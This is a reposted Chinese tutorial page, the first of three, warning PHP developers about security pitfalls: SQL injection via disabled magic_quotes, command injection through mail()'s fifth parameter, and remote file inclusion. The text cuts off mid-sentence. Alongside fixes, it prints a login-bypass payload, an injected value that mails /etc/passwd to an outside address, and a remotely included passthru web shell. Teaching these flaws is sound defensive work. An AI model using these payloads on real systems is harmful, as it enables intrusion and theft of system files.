设为首页  
联系我们  
加入收藏  
网页制作 冲浪宝典 图形图像 操作系统 软件教学 编程开发 认证考试 安全技术 站长专区 文学驿站 娱乐天地 游戏天地 办公软件
文章搜索
您的位置: 首页 >> 文章首页 >> 编程开发 >> 网络编程 >> PHP文摘 >> 使用PHP开发网站过程中你注意到这些安全知识了吗?
精品推荐
PHP文摘点击TOP10
·php4和php5区别
·PHP在Web开发领域的优势
·PHP VS ASP
·使用网络地址转换实现多服务器负载均衡
·使用PHP开发网站过程中你注意到这些安全知识了吗?
·PHP:“草根语言”挑战“大腕”Java .Net
·使用网络地址转换实现多服务器负载均衡
·PHP4在Windows2000下的安装
·初探PHP5
·大型Web需求解决方案 PHP定位突出
网络编程点击TOP10
·ASP.NET 程序中常用的三十三种代码
·CHK文件恢复工具
·.NET 初 级 读 本
·c#操作word表格
·我的.NET书架 (入门篇)
·『原创』C#中TreeView类操作全攻略:建立树,新增节点,删除节点,修改节点,拖动节点,与Oracle数据库交互操作(一)
·用C#实现木马程序
·从零开始学ASP.NET(基础篇)
·十天学会ASP.net之第一天
·官方水晶报表 .NET 应用程序实例下载 (C#、Visual C++.NET)
精选专题

使用PHP开发网站过程中你注意到这些安全知识了吗?

作者: 来源:http://www.xgdown.com/ 时间:2007-6-26 11:12:19

使用PHP开发网站过程中你注意到这些安全知识了吗?(1)

1、古老的欺骗SQL语句

在默认模式下,即使是你忘了把PHP.ini拷到/usr/local/lib/php.ini下,php还是打开magic_quotes_gpc=on。

这样所有从GET/POST/Cookie来的变量的单引号(')、双引号(")、反斜杠backslash(\)以及空字元NUL
(the null byte)都会被加上反斜杠,以使数据库能够正确查询。

但是在php-4-RC2的时候引入了一个配置文件php.ini-optimized,这个优化的php.ini却是
magic_quotes_gpc=off的。某些网管看到optimized字样也许就会把php.ini-optimized拷到
/usr/local/lib/php.ini,这时就比较危险。象比较简单的验证,假设没有过滤必要的字符:
select * from login where user='$HTTP_POST_VARS[user]' and pass='$HTTP_POST_VARS[pass]'
我们就可以在用户框和密码框输入1‘ or 1='1通过验证了。这是非常古董的方法了,这个语句会
替换成这样:

select * from login where user='1' or 1='1' and pass='1' or 1='1'

因为or 1='1'成立,所以通过了。

解决的办法最好就是过滤所有不必要的字符,还有就是推荐对于从GET/POST/Cookie来的并且用在SQL
中的变量加一个自定义的函数:

function gpc2sql($str) {
    if(get_magic_quotes_gpc()==1)
        return $str;
    else
        return addslashes($str);
}

主要是为了你的程序能安全移植在各种系统里。

2、mail函数的第五个参数

在php-4.0.5的时候,mail函数引入了第五个参数,用来设置在实际发送邮件的时候增加额外的命令行参数,但是没有很好的检查特殊SHELL命令字符,所以出现执行命令的大问题。就像手册里的例子:

mail("nobody@aol.com", "the subject", $message, "From: webmaster@$SERVER_NAME", "-fwebmaster@$SERVERNAM");

这个是存在问题的,如果$SERVER_NAME=;mail webjx@webjx.com < /etc/passwd就能把机器的密码发送到我的信箱了。

这里提醒一下,php手册里还有好几个例子存在安全问题的,大家实际使用的时候不要照搬,它只是演示函数的基本功能,理解了就可以了。

对于mail函数的这个问题,最简单的我们就不用这个第五个参数,要使用就过滤非法的字符如(;),还有就是修改php源码包的程序ext/standard/mail.c,在if (extra_cmd != NULL) { 前增加如下一行:

extra_cmd=NULL

然后重新编译。

3、Unix版的require, include函数

win版本的require和include函数是不支持HTTP和FTP远程文件包含的,而UNIX版本默认都是支持远程包含文件。

require和include不管你是什么扩展名的,把你包含进来就作为程序的一部分来执行。

我们在写程序的时候为了程序的模块化,以及程序的可移植性,不可避免的用到很多require或include函数,而且有时用变量作为参数,比如:include("$something"); 如果这时用户能控制$something参数,而这个参数又没有过滤,那就惨拉。

首先可以看任何web用户有读权限的文件,假设这个程序叫http://victim/test.php,这样我们就可以用如下

url: http://victim/test.php?something=/etc/passwd 看到/etc/passwd文件。

另外可以利用其远程文件包含的功能执行命令。比如我在www.AAA.org下建立一个文件test.php,内容是:

<?passthru($cmd)?>,那么我就可以用如下的url:

http://victim/test.php?something=http://www.xfocus.org/test.php?cmd=uname这种方式运行任

共3页 9 7 [1] [2] [38 :>

使用PHP开发网站过程中你注意到这些安全知识了吗? 相关文章:
使用PHP开发网站过程中你注意到这些安全知识了吗? 相关软件:
特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
转载请注明来源:http://www.xgdown.com